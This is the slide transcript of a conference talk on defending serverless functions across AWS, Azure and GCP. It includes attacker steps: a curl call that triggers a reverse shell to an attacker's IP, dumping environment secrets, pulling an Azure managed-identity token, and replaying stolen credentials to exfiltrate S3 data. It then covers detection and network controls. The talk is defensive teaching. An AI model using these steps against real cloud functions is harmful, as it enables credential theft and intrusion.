SlideShare a Scribd company logo
1 of 52
Download to read offline
#RSAC
SESSION ID:
#RSAC
SESSION ID:
Eric Johnson
Defending Serverless Infrastructure
in the Cloud
CSV-T12
Principal Security Engineer, Puma Security
Principal Instructor, SANS Institute
www.linkedin.com/in/eric-m-johnson
@emjohn20
#RSAC
Cloud Serverless Infrastructure
2
Functions as a Service (FaaS) managed infrastructure offerings
across the Big 3 cloud providers:
GCP FunctionsAzure FunctionsAWS Lambda
#RSAC
Goals For This Session
3
Reverse engineer the serverless execution environment
Discover insecurely stored function secrets
Exfiltrate authentication tokens from the serverless container
Detect stolen authentication tokens accessing cloud resources
Apply network controls to prevent command and control
Leverage audit logging and monitoring to detect malicious
activity
#RSAC#RSAC
Function Execution Environment
Defending Serverless Infrastructure in the Cloud
#RSAC
Function Execution Environment
5
Understanding the attacker's view of a serverless execution
environment helps prioritize defenses:
What user is executing the function?
What operating system (OS) is running the function?
What is the default directory?
Where is the source code?
What environment variables exist?
Where are the service account creds / authentication tokens?
What directories are writable?
#RSAC
Puma Security: Serverless Prey
6
Serverless Prey is an open source repository
containing:
Functions to establish a reverse shell in each cloud
– Cheetah: Google Function
– Cougar: Azure Function
– Panther: AWS Lambda
Code and documentation to reproduce information
presented in this session
https://github.com/pumasecurity/serverless-prey
#RSAC
Establishing The Function Reverse Shell
7
Function Invocation
Create the connection back to
the attacker's server:
Reverse Shell
Attacker's server waits for the incoming
connections and issues commands:
$ curl "https://us-
central1-precise-works-
123456.cloudfunctions.net
/cheetah?host=13.58.4.216
&port=1042"
#RSAC
Serverless Execution Environment
8
Reverse engineering each function's execution environment:
Function OS Directory User
NodeJS 12 Amazon Linux 2 /var/task sbx_user1051
.NET Core 3.1 Debian GNU/Linux 9 / app
Go 1.11 Ubuntu 18.04.2 LTS /srv/files root
#RSAC
Default Function Execution Networking
9
Configurable triggers
from HTTP or API
Gateway events
Routing allows Internet
egress traffic and
responses
Routing allows egress
traffic and responses to
public cloud service
APIs
Function
Private Subnet
Public Subnet
Internet
Gateway
Virtual Private
Cloud
Cloud
Internet
Storage Secrets
#RSAC#RSAC
Secrets Management
Defending Serverless Infrastructure in the Cloud
#RSAC
Hard-code in source code
Serverless Secrets Management Options
11
Options for managing secrets in cloud functions:
Deploy a configuration file in the function's deployment
package
Pass secrets into the runtime as environment variables
Read secrets from cloud key management service (KMS) or
secrets manager
#RSAC
Serverless Secrets: Where is the Source Code?
12
Start by looking for secrets in the function source code:
GCP Functions
Azure Functions
AWS Lambda
/var/task
/home/site/wwwroot/
/srv/files
#RSAC
GCP Function: Source Code Example
13
Inspecting the GCP Function deployment package:
1
2
3
4
5
6
7
8
9
10
$ ls –la /srv/files
total 167
-rw-r--r-- 1 root root 268 Jan 3 16:49 Makefile
-rw-r--r-- 1 root root 1898 Jan 3 16:49 cheetah.go
-rw-r--r-- 1 root root 178 Jan 3 16:49 cheetah.yaml
-rw-r--r-- 1 root root 170 Jan 3 16:49 go.mod
-rw-r--r-- 1 root root 1798 Jan 3 16:49 go.sum
-rw-r--r-- 1 root root 939 Jan 3 16:49 package.json
-rw-r--r-- 1 root root 710 Jan 3 16:49 serverless.yml
GCP Functions
#RSAC
GCP Function: Configuration File Example
14
Dumping the Go function's configuration data:
1
2
3
4
5
6
7
8
9
10
11
$ cat /srv/files/cheetah.yaml
# Server configurations
server:
host: "10.42.42.42"
port: 8000
# Database credentials
database:
user: "cheetah_user"
pass: "QnV0IHVuaWNvcm5zIGFwcGFyZW50bHkgZG8gZX
hpc3Qu" GCP Functions
#RSAC
Azure Function: Environment Variable Example
15
Environment variables can be accessed by remote attackers
using local file inclusion or command injection vulnerabilities:
1
2
3
4
5
6
7
8
9
$ cat /proc/self/environ
WEBSITE_AUTH_ENCRYPTION_KEY=BBDAD8269958635C8D4E3C713636D
APPSETTING_AzureWebJobsStorage=6BZ4kOCoSD7T1fc8v4h8JpRg==
APPSETTING_APPINSIGHTS_INSTRUMENTATIONKEY=5D17A234-6B81-
4777-8528-6814374E9BD3
MSI_SECRET=A788C6DE68224140A927BB412B4E24AB
AzureWebEncryptionKey=BBDAD8046F6B9F0E81A4B349
CONTAINER_ENCRYPTION_KEY=AYXxtNMabRpw2EIgoGpibUk= Azure
Functions
#RSAC
Serverless Secrets Management Options
16
Secrets can be stored in cloud-native secrets management services
and consumed by the function at runtime:
GCP Functions
Azure Functions
AWS Lambda
Secrets Manager / Parameter Store
Azure Key Vault
Secrets Manager
#RSAC
- Effect: Allow
Action: "ssm:GetParameter"
Resource: "arn:aws:ssm:us-east-1:1234567890
:parameter/panther/*"
Secrets Management: AWS Parameter Store Example
17
Parameter store provides encrypted secrets to the function at
runtime:
1
2
3
4
$ aws ssm put-parameter --name /panther/database/pass
--value "Panther" --type SecureString
{ "Version": 1, "Tier": "Standard" }
AWS Lambda
1
2
3
4
Policy allowing the function to read the parameter value:
#RSAC#RSAC
Function Execution Role
Defending Serverless Infrastructure in the Cloud
#RSAC
Serverless Execution Role
19
Functions gain access to other cloud resources (vault, secrets,
storage, database, etc.) by executing with predefined permissions:
GCP Functions
Azure Functions
AWS Lambda
Execution Role
Managed Identity
Service Account
#RSAC
GCP Function Default Service Account
20
GCP Functions
New functions inherit the Google managed "Editor" role by
default
Editor role inherits read and modify state permissions for all
existing project resources
Function has full read and write access to storage buckets
Payloads in the Secrets Manager require additional permissions
#RSAC
Serverless Account Credential Storage
21
Managed serverless platforms executing under a service account
have credentials stored in the following locations:
GCP
Functions
Azure Functions
AWS Lambda
Environment Variables
Managed Service Identity (MSI)
Instance Metadata Service (IMDS)
#RSAC
$ curl -H "Secret: $MSI_SECRET" "$MSI_ENDPOINT?
api-version=2017-09-01&
resource=https://storage.azure.com/"
Azure Managed Service Identity Credentials
22
Extracting the MSI endpoint and authentication token from
the function's environment:
1
2
3
4
$ cat /proc/self/environ | grep 'MSI'
MSI_ENDPOINT=http://localhost:8081/msi/token
MSI_SECRET=aEWPWND8qUk/U7RIkvY3IE8JetxQDZ9voUG
Azure
Functions
1
2
3
Requesting a JSON Web Token (JWT) from the MSI endpoint:
#RSAC
{
"aud": "https://storage.azure.com/",
"exp": 1577161854,
"xms_mirid": "/subscriptions/12345/resourcegroups/
cougar/…/pumapreycougar" }
Azure Managed Service Identity Token
23
The MSI endpoint returns a JSON Web Token (JWT) that can be
used to access the requested resource:
1
2
eyJ0…QSJ9.eyJh…TM3ZcHVtYXByZXktY291Z2FyL3Byb3ZpZGVycy9NaWN
yb3NvZnQuV2ViL3NpdGVzL3B1bWFwcmV5Y291Z2FyIn0.k8En4SIf…K9ag
Azure
Functions
1
2
3
4
5
Decoding the token reveals the audience, expiration,
subscription, etc.
#RSAC#RSAC
Function Data Persistence & Exfiltration
Defending Serverless Infrastructure in the Cloud
#RSAC
Function Credential Pivoting
25
Stolen function credentials can by replayed to gain access to cloud
resources under the function's identity:
GCP Functions
Azure Functions
AWS Lambda
AWS CLI
Azure REST API
GCloud REST API
#RSAC
$ aws s3 cp s3://panther-4dad894892ce
/assets/panther.jpg ~/Downloads/
AWS Credential Pivoting: Exfiltrating Secrets Example
26
Configuring the AWS CLI to authenticate as the function's
execution role:
1
2
3
$ export AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q…4pg9g==
$ export AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG
$ export AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A
1
2
3
Exfiltrating an object from the function's S3 bucket:
AWS
Lambda
#RSAC
Serverless Function Credential Lifetime
27
Comparing the credential expiration time (number of minutes)
across the cloud providers:
GCP Functions
Azure Functions
AWS Lambda
0 100 200 300 400 500 600 700 800
#RSAC
Function Malware Persistence Example
28
Serverless containers are vulnerable to malware persistence:
All function container file systems are read only by default
1
2
3
$ echo "X5O!P…C7}$EICAR-STANDARD-
ANTIVIRUS-TEST-FILE!$H+H*" > backdoor.go
/bin/sh: 8: cannot create backdoor.go: Read-only file system
1
2
3
$ echo "X5O!P…C7}$EICAR-STANDARD-
ANTIVIRUS-TEST-FILE!$H+H*" > /tmp/malware.sh
$ cat /tmp/malware.sh
X5O!P…C7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Except: all allow write access to the /tmp directory
GCP
Functions
#RSAC
Serverless Function Persistence Lifetime
29
Comparing the malware persistence lifetime (number of minutes)
across the cloud providers:
GCP
Functions
Azure Functions
AWS Lambda
0 2 4 6 8 10 12
#RSAC#RSAC
Detecting Compromised Function Credentials
Defending Serverless Infrastructure in the Cloud
#RSAC
Function Credential Audit Logging
31
Analyzing service audit logs can identify credential usage from
outside the function execution environment:
Azure Functions
AWS Lambda
CloudTrail
Azure Monitor (partial service support)
IAM Audit Logs
GCP Functions
#RSAC
Azure Monitor: Querying Diagnostics Example
32
Searching the diagnostics log for Azure Key Vault audit events:
1
2
3
4
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.KEYVAULT"
| where id_s contains "cougar-database-pass"
| order by TimeGenerated desc
Azure
Functions
#RSAC
Azure Monitor: Compromised Credentials?
33
Function service identity invoking SecretGet from inside the
execution environment:
1
2
3
4
5
6
7
TimeGenerated: 1/20/2020, 1:34:52.309 AM
identityClaim: …/providers/Microsoft.Web/sites/pumapreycougar
id_s: https://…vault.azure.net/secrets/cougar-database-pass/…
OperationName: SecretGet
ResultType: Success
CallerIPAddress: 20.189.179.189
clientinfo_s: azsdk-net-Security.KeyVault.Secrets/…
Azure
Functions
#RSAC
Azure Monitor: Compromised Credentials?
34
Function service identity invoking SecretGet from outside the
execution environment:
1
2
3
4
5
6
7
TimeGenerated: 1/20/2020, 1:34:52.309 AM
identityClaim: …/providers/Microsoft.Web/sites/pumapreycougar
id_s: https://…vault.azure.net/secrets/cougar-database-pass/…
OperationName: SecretGet
ResultType: Success
CallerIPAddress: 95.025.143.109
clientinfo_s: curl/7.64.1
Azure
Functions
#RSAC#RSAC
Function Network Access Controls
Defending Serverless Infrastructure in the Cloud
#RSAC
Function Network Integration Options
36
Function execution environments can integrate with customer
managed virtual private cloud networks:
Azure Functions
AWS Lambda
Virtual Private Cloud (VPC)
Virtual Network (VNet) Integration
*Premium plan only
Serverless Virtual Private Cloud (VPC) Access
GCP Functions
#RSAC
Function Network Integration Benefits
37
Disconnect functions
from the outside world
Leverage security
groups for restricting
traffic flow
Capture function
network flow logs
Protect cloud resources
with private cloud
endpoints Function
Private Subnet
Public Subnet
NAT Gateway
Virtual Private
Cloud
Database
(Optional)
Private
Cloud
Endpoints
Internet
X
X
X
Storage Secrets
#RSAC
Function Network Integration Example
38
Serverless framework configuration (serverless.yml) setting the
function execution environment's VPC and Security Group rules:
1
2
3
4
5
6
7
8
9
provider:
name: aws
runtime: nodejs12.x
vpc:
securityGroupIds:
- !Ref securityGroup
subnetIds:
- !Ref privateSubnet1
- !Ref privateSubnet2
AWS Lambda
#RSAC
Function Network Access Control
39
Enforcing strict function traffic flow rules can help prevent and
detect malware and data exfiltration:
Azure Functions
AWS Lambda
VPC Security Group
Network Security Group (NSG)
VPC Firewall Rules
GCP Functions
#RSAC
Function Network Access Control Rules
40
Manage function
execution environment
egress traffic
Create rules for trusted
services
Filter traffic by IP CIDR
block
Filter traffic by port
Function
Private Subnet
Public Subnet
NAT Gateway
Virtual Private
Cloud
Database
(Optional)
Private
Cloud
Endpoints
Internet
X
Storage Secrets
#RSAC
Function Traffic Flow: Security Group Example
41
Security Group configuration allowing egress traffic by port
443 and IP range:
1
2
3
4
5
6
7
8
10
11
12
securityGroup:
Type: "AWS::EC2::SecurityGroup"
Properties:
VpcId: !Ref lambdaVpc
GroupDescription: "Security group for panther."
SecurityGroupEgress:
- CidrIp: "10.42.0.0/16"
IpProtocol: "TCP"
FromPort: 443
ToPort: 443
Description: "Outbound 443 to our friends." AWS
Lambda
#RSAC
Function Network Flow Logs
42
Enabling network flow logs captures information about the
function's network traffic (src, dst, port, IP, etc.):
Azure Functions
AWS Lambda
VPC Flow Logs
NSG Flow Logs
VPC Flow Logs
GCP Functions
#RSAC
Function Network Flow: VPC Logs Example
43
Capturing flow log data in the function's assigned VPC:
1
2
3
4
5
6
7
8
flowLog:
Type: AWS::EC2::FlowLog
Properties:
DeliverLogsPermissionArn: !GetAtt flowLogRole.Arn
LogGroupName: !Sub "/aws/lambda/vpc/panther/flowlog"
ResourceId: !Ref lambdaVpc
ResourceType: "VPC"
TrafficType: "REJECT"
AWS Lambda
#RSAC
CloudWatch Insights: Querying VPC Flow Logs Example
44
Searching the CloudWatch log for flow log reject traffic:
1
2
3
4
fields @timestamp, @message
| filter dstPort = 1042
| sort @timestamp desc
| limit 20 AWS Lambda
#RSAC
Function Private Endpoints
45
Configuring private service endpoints creates a direct connection
between the function and cloud resources (no external traffic):
Azure Functions
AWS Lambda
Virtual Private Cloud (VPC) Endpoints
Azure Private Endpoint
Private Services Access
GCP Functions
#RSAC
Function Private Endpoint Configuration
46
Create private endpoint
cloud resources
Configure function VPC
to route to private
endpoint
Block access to cloud
resource from the
public API
Function
Private Subnet
Public Subnet
NAT Gateway
Virtual Private
Cloud
Database
(Optional)
Private
Cloud
Endpoints
Internet
Storage Secrets
#RSAC
Function Private Endpoint: S3 Example
47
Creating a private endpoint for function access to S3:
1
2
3
4
5
6
7
8
9
10
s3Endpoint:
Type: AWS::EC2::VPCEndpoint
Properties:
PolicyDocument: |
{ "Statement": [{ "Effect": "Allow"
, "Principal": "*", "Action": [ "s3:*" ] }] }
RouteTableIds:
- !Ref privateRouteTable
ServiceName: "com.amazonaws.us-east-1.s3"
VpcId: !Ref lambdaVpc
AWS Lambda
#RSAC
Function Private Endpoint: S3 Bucket Policy
48
Bucket policy blocking external access to S3 resources:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
bucketPolicy:
Type: "AWS::S3::BucketPolicy"
Properties:
Bucket: !Ref bucket
PolicyDocument: | { "Statement": [{
"Effect": "Deny",
"Principal": { "AWS": [ Fn::GetAtt [ "LambdaExecutionRole",
"Arn" ] ] },
"Action": [ "s3:*" ] }],
"Resource": [ Fn:GetAtt[ "bucket", "Arn" ] ],
"Condition": { "StringNotEquals": {
"aws:sourceVpce": { "Ref": "lambdaVpc" } }
}
} ] }
AWS
Lambda
#RSAC
Function Private Endpoint: Blocking Public Access
49
Invoking the public S3 API with stolen credentials from an
attacker's machine:
1
2
3
4
$ aws s3api list-objects --bucket panther-4dad894
An error occurred (AccessDenied) when calling the
ListObjects operation: Access Denied AWS Lambda
CloudTrail query searching for S3 access denied events:
#RSAC
Apply What Your Have Learned Today
50
Next week you should:
– Start a serverless function inventory across the cloud providers
– Scan function repositories for vulnerabilities and poor secrets management
Within 3 months, you should:
– Centralize function and network audit logs
– Develop a monitoring and alerting strategy for function logs
Within 6 months, you should:
– Leverage functions to automatically detect compromised function
credentials
#RSAC
Acknowledgements
51
Gal Bashan (@galbashan1)
– https://github.com/epsagon/lambda-internals
Brandon Evans (@BrandonMaxEvans)
– Senior Application Security Engineer, Asurion
OWASP Serverless Top 10 Project
– https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project
– Major contributions from Puresec and Protego
#RSAC
SESSION ID:
#RSAC
SESSION ID:
Eric Johnson
Defending Serverless Infrastructure
in the Cloud
CSV-T12
Principal Security Engineer, Puma Security
Principal Instructor, SANS Institute
www.linkedin.com/in/eric-m-johnson
@emjohn20

More Related Content

What's hot

Amazon EKS - security best practices - 2022
Amazon EKS - security best practices - 2022 Amazon EKS - security best practices - 2022
Amazon EKS - security best practices - 2022 Jean-François LOMBARDO
 
Policy as code what helm developers need to know about security
Policy as code  what helm developers need to know about securityPolicy as code  what helm developers need to know about security
Policy as code what helm developers need to know about securityLibbySchulze
 
Cloud Application Security: Lessons Learned
Cloud Application Security: Lessons LearnedCloud Application Security: Lessons Learned
Cloud Application Security: Lessons LearnedJason Chan
 
Security in Serverless world
Security in Serverless worldSecurity in Serverless world
Security in Serverless worldYan Cui
 
Practical Guide to Securing Kubernetes
Practical Guide to Securing KubernetesPractical Guide to Securing Kubernetes
Practical Guide to Securing KubernetesLacework
 
Continuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanContinuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanPuma Security, LLC
 
AWS Summit 2013 | Singapore - Security & Compliance and Integrated Security w...
AWS Summit 2013 | Singapore - Security & Compliance and Integrated Security w...AWS Summit 2013 | Singapore - Security & Compliance and Integrated Security w...
AWS Summit 2013 | Singapore - Security & Compliance and Integrated Security w...Amazon Web Services
 
(SEC404) Incident Response in the Cloud | AWS re:Invent 2014
(SEC404) Incident Response in the Cloud | AWS re:Invent 2014(SEC404) Incident Response in the Cloud | AWS re:Invent 2014
(SEC404) Incident Response in the Cloud | AWS re:Invent 2014Amazon Web Services
 
Introduction to DevSecOps on AWS
Introduction to DevSecOps on AWSIntroduction to DevSecOps on AWS
Introduction to DevSecOps on AWSAmazon Web Services
 
Pragmatic Security Automation for Cloud
Pragmatic Security Automation for CloudPragmatic Security Automation for Cloud
Pragmatic Security Automation for CloudPriyanka Aash
 
How to implement DevSecOps on AWS for startups
How to implement DevSecOps on AWS for startupsHow to implement DevSecOps on AWS for startups
How to implement DevSecOps on AWS for startupsAleksandr Maklakov
 
LASCON 2013 - AWS CLoud HSM
LASCON 2013 - AWS CLoud HSM LASCON 2013 - AWS CLoud HSM
LASCON 2013 - AWS CLoud HSM Oleg Gryb
 
Putting it All Together: Securing Systems at Cloud Scale
Putting it All Together: Securing Systems at Cloud ScalePutting it All Together: Securing Systems at Cloud Scale
Putting it All Together: Securing Systems at Cloud ScaleAmazon Web Services
 
Become a Cloud Security Ninja - RedLock Lab
Become a Cloud Security Ninja - RedLock LabBecome a Cloud Security Ninja - RedLock Lab
Become a Cloud Security Ninja - RedLock LabAmazon Web Services
 
Synnefo @ LinuxCon/CloudOpen North America 2014
Synnefo @ LinuxCon/CloudOpen North America 2014Synnefo @ LinuxCon/CloudOpen North America 2014
Synnefo @ LinuxCon/CloudOpen North America 2014Vangelis Koukis
 
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityKeynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityCloudVillage
 
Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”Priyanka Aash
 
Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Teri Radichel
 
Modern Security and Compliance Through Automation | AWS Public Sector Summit ...
Modern Security and Compliance Through Automation | AWS Public Sector Summit ...Modern Security and Compliance Through Automation | AWS Public Sector Summit ...
Modern Security and Compliance Through Automation | AWS Public Sector Summit ...Amazon Web Services
 

What's hot (20)

Amazon EKS - security best practices - 2022
Amazon EKS - security best practices - 2022 Amazon EKS - security best practices - 2022
Amazon EKS - security best practices - 2022
 
Policy as code what helm developers need to know about security
Policy as code  what helm developers need to know about securityPolicy as code  what helm developers need to know about security
Policy as code what helm developers need to know about security
 
Cloud Application Security: Lessons Learned
Cloud Application Security: Lessons LearnedCloud Application Security: Lessons Learned
Cloud Application Security: Lessons Learned
 
Security in Serverless world
Security in Serverless worldSecurity in Serverless world
Security in Serverless world
 
Practical Guide to Securing Kubernetes
Practical Guide to Securing KubernetesPractical Guide to Securing Kubernetes
Practical Guide to Securing Kubernetes
 
Continuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanContinuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma Scan
 
AWS Summit 2013 | Singapore - Security & Compliance and Integrated Security w...
AWS Summit 2013 | Singapore - Security & Compliance and Integrated Security w...AWS Summit 2013 | Singapore - Security & Compliance and Integrated Security w...
AWS Summit 2013 | Singapore - Security & Compliance and Integrated Security w...
 
(SEC404) Incident Response in the Cloud | AWS re:Invent 2014
(SEC404) Incident Response in the Cloud | AWS re:Invent 2014(SEC404) Incident Response in the Cloud | AWS re:Invent 2014
(SEC404) Incident Response in the Cloud | AWS re:Invent 2014
 
Introduction to DevSecOps on AWS
Introduction to DevSecOps on AWSIntroduction to DevSecOps on AWS
Introduction to DevSecOps on AWS
 
Pragmatic Security Automation for Cloud
Pragmatic Security Automation for CloudPragmatic Security Automation for Cloud
Pragmatic Security Automation for Cloud
 
How to implement DevSecOps on AWS for startups
How to implement DevSecOps on AWS for startupsHow to implement DevSecOps on AWS for startups
How to implement DevSecOps on AWS for startups
 
LASCON 2013 - AWS CLoud HSM
LASCON 2013 - AWS CLoud HSM LASCON 2013 - AWS CLoud HSM
LASCON 2013 - AWS CLoud HSM
 
Hybrid Cloud Networking
Hybrid Cloud NetworkingHybrid Cloud Networking
Hybrid Cloud Networking
 
Putting it All Together: Securing Systems at Cloud Scale
Putting it All Together: Securing Systems at Cloud ScalePutting it All Together: Securing Systems at Cloud Scale
Putting it All Together: Securing Systems at Cloud Scale
 
Become a Cloud Security Ninja - RedLock Lab
Become a Cloud Security Ninja - RedLock LabBecome a Cloud Security Ninja - RedLock Lab
Become a Cloud Security Ninja - RedLock Lab
 
Synnefo @ LinuxCon/CloudOpen North America 2014
Synnefo @ LinuxCon/CloudOpen North America 2014Synnefo @ LinuxCon/CloudOpen North America 2014
Synnefo @ LinuxCon/CloudOpen North America 2014
 
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityKeynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
 
Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”Corpsec: “What Happened to Corpses A and B?”
Corpsec: “What Happened to Corpses A and B?”
 
Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018
 
Modern Security and Compliance Through Automation | AWS Public Sector Summit ...
Modern Security and Compliance Through Automation | AWS Public Sector Summit ...Modern Security and Compliance Through Automation | AWS Public Sector Summit ...
Modern Security and Compliance Through Automation | AWS Public Sector Summit ...
 

Similar to Defending Serverless Infrastructure in the Cloud

Serverless Architectural Patterns & Best Practices
Serverless Architectural Patterns & Best PracticesServerless Architectural Patterns & Best Practices
Serverless Architectural Patterns & Best PracticesDaniel Zivkovic
 
Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Teri Radichel
 
Red Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWSRed Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWSPriyanka Aash
 
Serverless Security: Are you ready for the Future?
Serverless Security: Are you ready for the Future?Serverless Security: Are you ready for the Future?
Serverless Security: Are you ready for the Future?James Wickett
 
DevOps Fest 2019. Alex Casalboni. Configuration management and service discov...
DevOps Fest 2019. Alex Casalboni. Configuration management and service discov...DevOps Fest 2019. Alex Casalboni. Configuration management and service discov...
DevOps Fest 2019. Alex Casalboni. Configuration management and service discov...DevOps_Fest
 
Flying Server-less on the Cloud with AWS Lambda
Flying Server-less on the Cloud with AWS LambdaFlying Server-less on the Cloud with AWS Lambda
Flying Server-less on the Cloud with AWS LambdaSerkan Özal
 
AWS re:Invent 2016: ↑↑↓↓←→←→ BA Lambda Start (SVR305)
AWS re:Invent 2016: ↑↑↓↓←→←→ BA Lambda Start (SVR305)AWS re:Invent 2016: ↑↑↓↓←→←→ BA Lambda Start (SVR305)
AWS re:Invent 2016: ↑↑↓↓←→←→ BA Lambda Start (SVR305)Amazon Web Services
 
DevOps, Microservices and Serverless Architecture
DevOps, Microservices and Serverless ArchitectureDevOps, Microservices and Serverless Architecture
DevOps, Microservices and Serverless ArchitectureMikhail Prudnikov
 
Alex Casalboni - Configuration management and service discovery - Codemotion ...
Alex Casalboni - Configuration management and service discovery - Codemotion ...Alex Casalboni - Configuration management and service discovery - Codemotion ...
Alex Casalboni - Configuration management and service discovery - Codemotion ...Codemotion
 
대용량 데이타 쉽고 빠르게 분석하기 :: 김일호 솔루션즈 아키텍트 :: Gaming on AWS 2016
대용량 데이타 쉽고 빠르게 분석하기 :: 김일호 솔루션즈 아키텍트 :: Gaming on AWS 2016대용량 데이타 쉽고 빠르게 분석하기 :: 김일호 솔루션즈 아키텍트 :: Gaming on AWS 2016
대용량 데이타 쉽고 빠르게 분석하기 :: 김일호 솔루션즈 아키텍트 :: Gaming on AWS 2016Amazon Web Services Korea
 
Common Infrastructure Exploits in AWS/GCP/Azure Servers and Containers
Common Infrastructure Exploits in AWS/GCP/Azure Servers and ContainersCommon Infrastructure Exploits in AWS/GCP/Azure Servers and Containers
Common Infrastructure Exploits in AWS/GCP/Azure Servers and ContainersPriyanka Aash
 
Serverless cat detector workshop - cloudyna 2017 (16.12.2017)
Serverless cat detector   workshop - cloudyna 2017 (16.12.2017)Serverless cat detector   workshop - cloudyna 2017 (16.12.2017)
Serverless cat detector workshop - cloudyna 2017 (16.12.2017)Paweł Pikuła
 
Lessons Learnt from Running Thousands of On-demand Spark Applications
Lessons Learnt from Running Thousands of On-demand Spark ApplicationsLessons Learnt from Running Thousands of On-demand Spark Applications
Lessons Learnt from Running Thousands of On-demand Spark ApplicationsItai Yaffe
 
AWS Lambda and the Serverless Cloud
AWS Lambda and the Serverless CloudAWS Lambda and the Serverless Cloud
AWS Lambda and the Serverless CloudAmazon Web Services
 
Riga DevDays 2017 - Efficient AWS Lambda
Riga DevDays 2017 - Efficient AWS LambdaRiga DevDays 2017 - Efficient AWS Lambda
Riga DevDays 2017 - Efficient AWS LambdaAntons Kranga
 
Secure Kafka at scale in true multi-tenant environment ( Vishnu Balusu & Asho...
Secure Kafka at scale in true multi-tenant environment ( Vishnu Balusu & Asho...Secure Kafka at scale in true multi-tenant environment ( Vishnu Balusu & Asho...
Secure Kafka at scale in true multi-tenant environment ( Vishnu Balusu & Asho...confluent
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityPriyanka Aash
 

Similar to Defending Serverless Infrastructure in the Cloud (20)

Serverless Architectural Patterns & Best Practices
Serverless Architectural Patterns & Best PracticesServerless Architectural Patterns & Best Practices
Serverless Architectural Patterns & Best Practices
 
Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018
 
Red Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWSRed Team vs. Blue Team on AWS
Red Team vs. Blue Team on AWS
 
Top conf serverlezz
Top conf   serverlezzTop conf   serverlezz
Top conf serverlezz
 
Serverless Security: Are you ready for the Future?
Serverless Security: Are you ready for the Future?Serverless Security: Are you ready for the Future?
Serverless Security: Are you ready for the Future?
 
DevOps Fest 2019. Alex Casalboni. Configuration management and service discov...
DevOps Fest 2019. Alex Casalboni. Configuration management and service discov...DevOps Fest 2019. Alex Casalboni. Configuration management and service discov...
DevOps Fest 2019. Alex Casalboni. Configuration management and service discov...
 
Flying Server-less on the Cloud with AWS Lambda
Flying Server-less on the Cloud with AWS LambdaFlying Server-less on the Cloud with AWS Lambda
Flying Server-less on the Cloud with AWS Lambda
 
AWS re:Invent 2016: ↑↑↓↓←→←→ BA Lambda Start (SVR305)
AWS re:Invent 2016: ↑↑↓↓←→←→ BA Lambda Start (SVR305)AWS re:Invent 2016: ↑↑↓↓←→←→ BA Lambda Start (SVR305)
AWS re:Invent 2016: ↑↑↓↓←→←→ BA Lambda Start (SVR305)
 
DevOps, Microservices and Serverless Architecture
DevOps, Microservices and Serverless ArchitectureDevOps, Microservices and Serverless Architecture
DevOps, Microservices and Serverless Architecture
 
Alex Casalboni - Configuration management and service discovery - Codemotion ...
Alex Casalboni - Configuration management and service discovery - Codemotion ...Alex Casalboni - Configuration management and service discovery - Codemotion ...
Alex Casalboni - Configuration management and service discovery - Codemotion ...
 
Aplicaciones distribuidas con Dapr
Aplicaciones distribuidas con DaprAplicaciones distribuidas con Dapr
Aplicaciones distribuidas con Dapr
 
대용량 데이타 쉽고 빠르게 분석하기 :: 김일호 솔루션즈 아키텍트 :: Gaming on AWS 2016
대용량 데이타 쉽고 빠르게 분석하기 :: 김일호 솔루션즈 아키텍트 :: Gaming on AWS 2016대용량 데이타 쉽고 빠르게 분석하기 :: 김일호 솔루션즈 아키텍트 :: Gaming on AWS 2016
대용량 데이타 쉽고 빠르게 분석하기 :: 김일호 솔루션즈 아키텍트 :: Gaming on AWS 2016
 
Common Infrastructure Exploits in AWS/GCP/Azure Servers and Containers
Common Infrastructure Exploits in AWS/GCP/Azure Servers and ContainersCommon Infrastructure Exploits in AWS/GCP/Azure Servers and Containers
Common Infrastructure Exploits in AWS/GCP/Azure Servers and Containers
 
Serverless cat detector workshop - cloudyna 2017 (16.12.2017)
Serverless cat detector   workshop - cloudyna 2017 (16.12.2017)Serverless cat detector   workshop - cloudyna 2017 (16.12.2017)
Serverless cat detector workshop - cloudyna 2017 (16.12.2017)
 
Lessons Learnt from Running Thousands of On-demand Spark Applications
Lessons Learnt from Running Thousands of On-demand Spark ApplicationsLessons Learnt from Running Thousands of On-demand Spark Applications
Lessons Learnt from Running Thousands of On-demand Spark Applications
 
